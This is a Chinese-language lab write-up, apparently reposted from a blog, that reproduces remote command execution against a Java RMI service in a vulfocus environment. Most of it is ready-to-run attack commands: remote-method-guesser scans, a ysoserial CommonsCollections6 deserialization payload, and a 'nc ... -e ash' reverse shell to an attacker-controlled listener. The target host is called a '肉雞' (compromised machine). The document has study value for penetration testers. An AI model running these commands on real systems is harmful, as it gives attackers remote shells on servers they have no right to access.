漏洞復現-java_rmi遠程命令執行


0x00 實驗環境

攻擊機:Ubuntu

靶場:vulfocus搭建的靶場環境

 

0x01 影響版本

使用nmap,探測到有java rmi服務的都可以測試一下:

 

0x02 漏洞復現

(1)訪問存在的漏洞頁面

 

 (2)首先需要安裝一下這個工具

https://github.com/qtc-de/remote-method-guesser

 

git clone https://github.com/qtc-de/remote-method-guesser
cd remote-method-guesser
mvn package

出現success即可:

 

 (2)在opt目錄下下載並創建文件夾目錄如下所示(主要用於第5步,反彈shell):

創建opt/ysoserial/target/,然后去github上搜索這個文件:ysoserial-0.0.6-SNAPSHOT-all.jar(自己搜索即可,不管是測shiro還是啥的都有的)

 

 (3)在target目錄下執行漏掃命令:

cd target
java -jar rmg-3.3.0-jar-with-dependencies.jar 肉雞IP 肉雞端口

 

 報錯的話就加個--ssl

 發現了就可以開展測試。

 

(4)target執行數據接收命令:

java -jar rmg-3.3.0-jar-with-dependencies.jar 肉雞IP 肉雞端口 reg AnTrinh 攻擊機IP:攻擊機端口 --ssl

 

 同時攻擊機也開啟監聽:

nc -lvvp 8989

 

 監聽成功會返回"JRMIK"字樣的數據

(5)反彈shell:

攻擊機開三個窗口:

第一個執行:

java -jar rmg-3.3.0-jar-with-dependencies.jar 肉雞IP 肉雞端口 reg AnTrinh 攻擊機IP:攻擊機端口A --ssl

 

第二個執行:

java -jar rmg-3.3.0-jar-with-dependencies.jar 0.0.0.0 攻擊機端口A listen CommonsCollections6 "nc 攻擊機IP 攻擊機端口B -e ash" --ssl

 

第三個執行:

nc -lvp 攻擊機端口B

 成功反彈shell!

0x03 參考文獻

https://github.com/qtc-de/remote-method-guesser

大哥的悉心指點。

 

0x04 免責聲明

本漏洞復現文章僅用於學習、工作與興趣愛好,並立志為網絡安全奉獻一份力量,凡是利用本博客相關內容的無良hackers造成的安全事故均與本人無關!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM